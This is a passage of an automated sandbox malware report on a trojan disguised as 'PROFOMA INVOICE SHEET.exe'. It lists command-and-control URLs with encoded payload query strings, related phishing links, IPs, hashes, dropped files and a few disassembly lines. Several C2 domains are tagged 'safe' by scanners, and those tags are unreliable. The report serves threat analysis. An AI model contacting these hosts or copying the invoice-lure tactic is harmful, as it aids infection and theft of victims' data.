                              www.weatherbook.live
                              unknown
                              unknowntrueunknown
                              www.crowsecurity.cloud
                              unknown
                              unknowntrue
                                unknown
                                www.newdaydawning.net
                                unknown
                                unknowntrueunknown
                                www.whats-in-the-box.org
                                unknown
                                unknowntrueunknown
                                www.lanxuanz.tech
                                unknown
                                unknowntrueunknown
                                www.wajf.net
                                unknown
                                unknowntrue
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.crowsecurity.cloud/jvjp/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.newdaydawning.net/72tr/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.crowsecurity.cloud/jvjp/?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eHfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.inspireplay.live/p8sm/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.aaavvejibej.bond/lpl9/?h2Pt9=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&4RLhs=7BJLM4eHfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.lanxuanz.tech/ivo1/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.inspireplay.live/p8sm/?h2Pt9=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=&4RLhs=7BJLM4eHfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.o731lh.vip/2mtz/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.selftip.top/85su/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.weatherbook.live/4hiy/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk=false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.wajf.net/zl4r/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.wajf.net/zl4r/?h2Pt9=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&4RLhs=7BJLM4eHfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.o731lh.vip/2mtz/?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0=false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.selftip.top/85su/?h2Pt9=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&4RLhs=7BJLM4eHfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.whats-in-the-box.org/30jd/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.weatherbook.live/4hiy/?h2Pt9=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&4RLhs=7BJLM4eHfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.shanhaiguan.net/p2q3/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.lanxuanz.tech/ivo1/?h2Pt9=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=&4RLhs=7BJLM4eHfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabTapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.zoho.com/sites/images/professionally-crafted-themes.pngTapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.wajf.netbJWYsPIiPtg.exe, 00000007.00000002.4150699714.00000000025CA000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.ecosia.org/newtab/TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.techTapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ac.ecosia.org/autocomplete?q=TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjTapiUnattend.exe, 00000006.00000002.4151512701.0000000004984000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000039C4000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchTapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumbTapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.21.31.249
                                  www.aaavvejibej.bondUnited States
                                  13335CLOUDFLARENETUSfalse
                                  156.242.132.82
                                  www.shanhaiguan.netSeychelles
                                  132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                  136.143.186.12
                                  zhs.zohosites.comUnited States
                                  2639ZOHO-ASUSfalse
                                  199.192.21.169
                                  www.selftip.topUnited States
                                  22612NAMECHEAP-NETUSfalse
                                  44.213.25.70
                                  newdaydawning.netUnited States
                                  14618AMAZON-AESUSfalse
                                  54.81.206.248
                                  cdl-lb-1356093980.us-east-1.elb.amazonaws.comUnited States
                                  14618AMAZON-AESUSfalse
                                  3.33.130.190
                                  crowsecurity.cloudUnited States
                                  8987AMAZONEXPANSIONGBfalse
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1511723
                                  Start date and time:2024-09-16 09:28:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 10m 28s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:2
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:PROFOMA INVOICE SHEET.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@14/7
                                  EGA Information:
                                  • Successful, ratio: 75%
                                  HCA Information:
                                  • Successful, ratio: 90%
                                  • Number of executed functions: 44
                                  • Number of non-executed functions: 300
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  TimeTypeDescription
                                  03:30:19API Interceptor9381238x Sleep call for process: TapiUnattend.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  136.143.186.12x.exeGet hashmaliciousFormBookBrowse
                                  • www.lanxuanz.tech/em49/
                                  bin.exeGet hashmaliciousFormBookBrowse
                                  • www.lanxuanz.tech/em49/
                                  PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                  • www.jrksa.info/nq8t/
                                  w3xlXm0r8W.exeGet hashmaliciousFormBookBrowse
                                  • www.novaminds.online/ephb/?xN6PGj=vLmbgoHRNfK6ITOjmiLFGNRbChMUzx7XLdCca8olfY2Nxc16AQQbup47Ltpv+Aaivc7Y&_0DPe6=UHL0NdrXCvl
                                  RFQ-9877678-9988876509886546887.exeGet hashmaliciousFormBookBrowse
                                  • www.jrksa.info/nq8t/
                                  RFQ-9877678-9988876509886546884.exeGet hashmaliciousFormBookBrowse
                                  • www.jrksa.info/nq8t/
                                  H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                  • www.jrksa.info/mcz6/
                                  RFQ 5654077845567895504_d0c.exeGet hashmaliciousFormBookBrowse
                                  • www.jrksa.info/nq8t/
                                  VSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                  • www.topscaleservices.com/uyud/?4PB=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af96nyleFJwK0nJryK+5dgXb3T0bI8KcvkRm3LjrqBQ==&wdZh=n2Ih08C05RZDa
                                  SCAN_0033245554672760018765524126524_pdf.exeGet hashmaliciousFormBookBrowse
                                  • www.jrksa.info/nq8t/
                                  199.192.21.169SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                  • www.zenscape.top/d8cw/
                                  file.exeGet hashmaliciousFormBookBrowse
                                  • www.urbanpulse.help/r50h/
                                  INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                  • www.cenfresh.life/6iok/
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  webredir.vip.gandi.netFATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                  • 217.70.184.50
                                  z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                  • 217.70.184.50
                                  Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                  • 217.70.184.50
                                  DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                  • 217.70.184.50
                                  PO #86637.exeGet hashmaliciousFormBookBrowse
                                  • 217.70.184.50
                                  au1FjlRwFR.exeGet hashmaliciousFormBookBrowse
                                  • 217.70.184.50
                                  COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                  • 217.70.184.50
                                  Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exeGet hashmaliciousFormBookBrowse
                                  • 217.70.184.50
                                  COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                  • 217.70.184.50
                                  DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                  • 217.70.184.50
                                  zhs.zohosites.comx.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.186.12
                                  bin.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.186.12
                                  PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.186.12
                                  w3xlXm0r8W.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.186.12
                                  RFQ-9877678-9988876509886546887.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.186.12
                                  RFQ-9877678-9988876509886546884.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.186.12
                                  VSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.180.12
                                  eNXDCIvEXI.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.180.12
                                  H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.186.12
                                  RFQ 5654077845567895504_d0c.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.186.12
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  POWERLINE-AS-APPOWERLINEDATACENTERHKSecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                  • 45.114.171.236
                                  RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                                  • 45.114.171.236
                                  z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                  • 154.213.157.32
                                  SecuriteInfo.com.Linux.Siggen.9999.5151.15671.elfGet hashmaliciousMiraiBrowse
                                  • 160.124.177.51
                                  Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                                  • 154.216.48.123
                                  firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                  • 156.250.222.244
                                  firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                  • 154.216.66.110
                                  firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                  • 154.202.175.222
                                  ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                  • 154.92.59.24
                                  8htbxM8GPX.exeGet hashmaliciousFormBookBrowse
                                  • 154.215.72.110
                                  CLOUDFLARENETUSSeptember PO.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.12.205
                                  TT USD 170,196 - 16.9.2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 188.114.96.3
                                  Benefit Upadate For Guillaume.a.docxGet hashmaliciousHTMLPhisherBrowse
                                  • 104.17.25.14
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 172.67.74.152
                                  Benefit Upadate For Guillaume.a.docxGet hashmaliciousHTMLPhisherBrowse
                                  • 188.114.96.3
                                  SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.137.232
                                  SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                  • 104.18.111.161
                                  SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.137.232
                                  DONGHONG 8 - FDA.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 188.114.96.3
                                  Petronas request for-quotation.exeGet hashmaliciousFormBookBrowse
                                  • 104.21.64.108
                                  ZOHO-ASUSx.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.186.12
                                  bin.exeGet hashmaliciousFormBookBrowse
                                  • 136.143.186.12
                                  https://americanathletic.zohodesk.com/portal/en/kb/articles/secure-business-documentsGet hashmaliciousUnknownBrowse
                                  • 136.143.191.172
                                  x86.elfGet hashmaliciousUnknownBrowse
                                  • 165.173.254.246
                                  https://authenticatesrv.spiritproducts.net/ck1/2d6f.7c034e718db46b30/419a3880-5f16-11ef-b8e1-525400721611/9f8bdc6e12526302fc1bc1642c86f78252fda8c1/2?e=Nm%2BKwgX31zZZHmcYOfoRL7XItJEu0aj7qdUQZVkwW4SjJAvb0T0NYaII1ijFN8OsBsszx8gv12KAbT3RDPMeVw%2FbefV4L1yqgi%2FKG9lD6NQTrh%2BQ2ox9o1TV16RIuHKxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 204.141.42.213
                                  https://insights.zohorecruit.com/ck1/2d6f.390d3f0/fab65c60-5e29-11ef-896b-525400d6cd4f/02e60029eb3c4e09f8e3cb9644fa23262f52aa86/2?e=arqOrxEM1Pu0aMl2J4DeUujZWH3TPRnuK%2F%2F50IkkynofyG9S9LzMCQGQeD3A8%2BvCqigeqgLnvt4AorXAOg1unw%3D%3DGet hashmaliciousUnknownBrowse
                                  • 204.141.42.213
                                  http://workdrive.zohoexternal.comGet hashmaliciousUnknownBrowse
                                  • 204.141.43.16
                                  https://workdrive.zohoexternal.com/external/writer/46fdf68b2f78265d07797e09c63aeef4064c3374cfc014062660688cb6876b9bGet hashmaliciousUnknownBrowse
                                  • 204.141.43.16
                                  https://diverescueintl.com/Get hashmaliciousHTMLPhisherBrowse
                                  • 204.141.43.67
                                  https://mail.osd.is/ahoy/v1/messages/tmUud75kaX5i84jrSddi7RvRoEwnRvGI/click?signature=365a74d8cf6aaa475deb70de401d91b3730068bd&url=https%3A%2F%2Fclicks.behanbros.com%2Fck1%2F2d6f.1666ed262aa69c30%2F85235e80-5a3c-11ef-aa46-525400e18d05%2F1aecbc6e17a7f32f257de147fdcb114dbde4bd0f%2F2%3Fe%3DFl%252F%252FoUXSWwF4eWEmDhD8bO767DIweN%252FgbynhnWQQmfCORP5QUcVtfSPOtr6%252BDxnpoDuQRdtqwnyF1KluaSYTaR5UeBEE6yffkypjSqmL7J5ipExtaLftHqKh%252Bzv8vTL5qyxfKjbZr99sma1YKqi%252BfzRl17ovpu6A5oDfKTScZKLDd12RZf6UCFYMHyoZPddgcbE6zuIJMb5qTeXnQnSyL77bJHrzBkIFTbFomV22oj2Sxfjmusf37%252FtRQJIonhWvmQ2eYZUHNrDGIKboriJd18Zdx8rSd83CHzT8YvPCIJeLAvnSG0%252Bbpl1MNIIFumjajHiG90XC2irPRPcW5GaTA%252BITIsF2wBg8CIBvVGEGwXo4JP3%252B8Onp5k1RR6k7BKW%252BqGlHBTGPuAxqoP%252Ff0cZzsNc21UGjnmx7wKErLb4FefcMhXTbRK3q8zETD9j%252FiR%252FLnM6uZibPZVB9o6ivg7AJj8bKpFnLyO4DwVX0BNeCbVAJFxoU%252BZ%252FZ39PxrsnfftlrJkRaLDKMH%252BxTiRDaunilyq4JKe0%252BcbtfKZUAa27j2VFwYwqEjlzGnrX5%252Fdou7iokpKv8aEs8pQ%252BQIV2dR4YqT%252B5vCkp3w6nguoVaO3EoNbbCRozXu1Ic0kXeinEPwDg3l1%252BY%252FBli4EK0EedpP4%252BP0v3jxxncnqIhYIj45CpXHI88Qx5mocDHAgYzq2CBlrn%252FcsWWOshJql5b6xAr8pq6FNrXoiOolx1VvwyFY8HnDgG9gKxZtCrQP3IS4iN412x0hygoxuA99srteXs7BDcl5V6J3whqQPl%252BznVvdxEPQFxDwIxzw9RUXXdGay00DF%252FLAKov2ZuUmlBbZsW94VCaHg%253D%253DGet hashmaliciousHTMLPhisherBrowse
                                  • 204.141.42.213
                                  NAMECHEAP-NETUSPetronas request for-quotation.exeGet hashmaliciousFormBookBrowse
                                  • 162.0.236.169
                                  file.exeGet hashmaliciousClipboard Hijacker, Raccoon Stealer v2Browse
                                  • 198.54.120.231
                                  file.exeGet hashmaliciousClipboard Hijacker, Raccoon Stealer v2Browse
                                  • 198.54.120.231
                                  k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                  • 63.250.47.40
                                  https://urlz.fr/s6ZWGet hashmaliciousUnknownBrowse
                                  • 63.250.43.136
                                  SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                  • 162.0.239.141
                                  https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                  • 162.0.228.73
                                  https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                  • 162.0.228.73
                                  https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Br%C2%ADo%C2%ADt%C2%ADv%C2%AD2%C2%AD4.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FKtdCRbWJN443KOWzPtjJuhJU/YW15LmpGet hashmaliciousHTMLPhisherBrowse
                                  • 192.64.117.211
                                  SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                  • 199.192.21.169
                                  No context
                                  No context
                                  Process:C:\Windows\SysWOW64\TapiUnattend.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                  Category:dropped
                                  Size (bytes):114688
                                  Entropy (8bit):0.9746603542602881
                                  Encrypted:false
                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):288768
                                  Entropy (8bit):7.992693975408507
                                  Encrypted:true
                                  SSDEEP:6144:8R9jr+Z/n4Iq0N6cTs0FpRR+k+W+h//2dkSvwOvUV6:s9fE/4Iq0cozR+g+/ivS6
                                  MD5:A5CEAA771B77E07D5C822F3441E59382
                                  SHA1:27D92211AAC4C6E8C7AA1DB1DAC9221EF7BFF061
                                  SHA-256:422A51996F3C1D9A4E1227FA1F09B1E1B3C55485D49EF63424568795D6835FC0
                                  SHA-512:94D35B1FA6585E96B339B32276F83C254EB7F9C0987ADC9281988FFE4C3557405184498D355BEB4F7687878A964F0C25A77F6451A22322E84D1817FE0ADA4131
                                  Malicious:false
                                  Reputation:low
                                  Preview:.o|d.8EHV...0....t.IR...x;M...Q596P8EHVIQ596P8EHVIQ596P8EHVI.596^'.FV.X...Qt.i.!8F.F"W":7$qVXX>W1h4,qGLXpQ+h....TY4]kE[Cu596P8EH/HX..V7.x(1.lU^.J..l)6.#...y(1.K...lX".. 2].V7.EHVIQ596.}EH.HP5..0fEHVIQ596.8GI]HZ59`T8EHVIQ5960,EHVYQ59FT8EH.IQ%96P:EHPIQ596P8CHVIQ596PHAHVKQ596P8GH..Q5)6P(EHVIA59&P8EHVIA596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ5.B5@1HVI.a=6P(EHV.U59&P8EHVIQ596P8EHvIQU96P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVI
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.474609294729958
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:PROFOMA INVOICE SHEET.exe
                                  File size:1'722'368 bytes
                                  MD5:bc8d560138e7ac511f70880fc394ad2d
                                  SHA1:ab4eba09f7c4ba9e4dda6d9001f310347540d665
                                  SHA256:50298005475ae317206625562212774d14ecad26a7fd979251618b53f5c65d22
                                  SHA512:1d3b9c9e4c775cef4c4b67f236c494d1b1c64f545deb7c30f6bee213a1d458c913a8c80cb6748feb19b16d4d9cc7c2a0e6d2787dd21f3a2582a0b40a57290810
                                  SSDEEP:24576:FqDEvCTbMWu7rQYlBQcBiT6rprG8aX6gG4eE1Cxitdma80INtB8AauseQsM:FTvC/MTQYxsWR7aXnUeCxQ2zBmuvb
                                  TLSH:9D85E1027391C022FFABA2734F5AF6514BBC69260123E61F13A81DB9BD705B1563E763
                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                  Icon Hash:aaf3e3e3938382a0
                                  Entrypoint:0x420577
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66E76C11 [Sun Sep 15 23:21:53 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:948cc502fe9226992dce9417f952fce3
                                  Instruction
                                  call 00007F6BD4F46C83h
                                  jmp 00007F6BD4F4658Fh
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  push dword ptr [ebp+08h]
                                  mov esi, ecx
                                  call 00007F6BD4F4676Dh
                                  mov dword ptr [esi], 0049FDF0h
                                  mov eax, esi
                                  pop esi
                                  pop ebp
